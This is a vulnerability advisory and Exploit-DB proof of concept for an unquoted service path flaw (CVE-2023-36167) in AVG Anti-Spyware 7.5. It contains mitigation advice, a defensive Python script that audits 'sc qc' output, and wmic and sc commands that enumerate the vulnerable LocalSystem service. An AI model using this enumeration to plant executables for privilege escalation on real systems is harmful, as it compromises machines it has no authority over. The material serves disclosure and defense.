Vendor: AVG Anti-Spyware
By: Idan Malihi
CVSS: 6.8 (MEDIUM)
CWE: 428 (Unquoted Service Path)
Product Name: AVG Anti-Spyware
Affected Version From: 7.5
Affected Version To: 7.5
Patch Exists: NO
Related CVE: CVE-2023-36167
CPE: a:avg:anti_spyware:7.5
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

AVG Anti Spyware 7.5 – Unquoted Service Path

The AVG Anti-Spyware 7.5 software on Windows 10 Pro has an unquoted service path vulnerability, which allows local users to gain privileges via a crafted executable file in the %SYSTEMDRIVE% folder.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to include the correct quoting of the service path. Users should also ensure that their systems have the latest security updates installed.
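A defender can check for this condition from `sc qc` output. The following is an added example, not part of the original advisory or any AVG or Exploit-DB code: it flags service image paths that are unquoted and contain spaces, lists the earlier locations Windows would try (which should not exist or be writable by non-administrators), and gives the quoted form of the path. It assumes the image path ends in `.exe`; `ExampleQuotedSvc` and the function names are constructed for illustration.

```python
import re

# `sc qc` fields for the service on this page, plus a constructed quoted entry.
SC_QC_SAMPLE = r"""
SERVICE_NAME: AVG Anti-Spyware Guard
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: ExampleQuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
        SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")

def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one dict per service."""
    services = []
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "SERVICE_NAME":
            services.append({})
        if services:
            services[-1][key] = value
    return services

def audit_path(binary_path):
    """Return (exe, stray): stray lists paths tried before exe; empty if quoted."""
    if binary_path.startswith('"'):
        return binary_path.split('"')[1], []
    m = re.search(r"\.exe(?=\s|$)", binary_path, re.I)
    exe = binary_path[:m.end()] if m else binary_path
    tokens = [exe[:i] for i, ch in enumerate(exe) if ch == " "]
    # CreateProcess appends .exe only when the file name has no extension.
    return exe, [t if "." in t.rsplit("\\", 1)[-1] else t + ".exe" for t in tokens]

def report(text):
    """List services whose unquoted path needs quoting, with paths to audit."""
    findings = []
    for svc in parse_sc_qc(text):
        exe, stray = audit_path(svc.get("BINARY_PATH_NAME", ""))
        if stray:
            findings.append({"service": svc["SERVICE_NAME"], "audit": stray,
                             "quoted": f'"{exe}"'})
    return findings

if __name__ == "__main__":
    print(report(SC_QC_SAMPLE))
```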

Exploit-DB raw data:

# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.avg.com
# Software Link: https://www.avg.com/en-ww/homepage#pc
# Version: 7.5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36167

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
AVG Anti-Spyware Guard                                                              AVG Anti-Spyware Guard                    C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe                            Auto

C:\Users>sc qc "AVG Anti-Spyware Guard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AVG Anti-Spyware Guard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AVG Anti-Spyware Guard
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation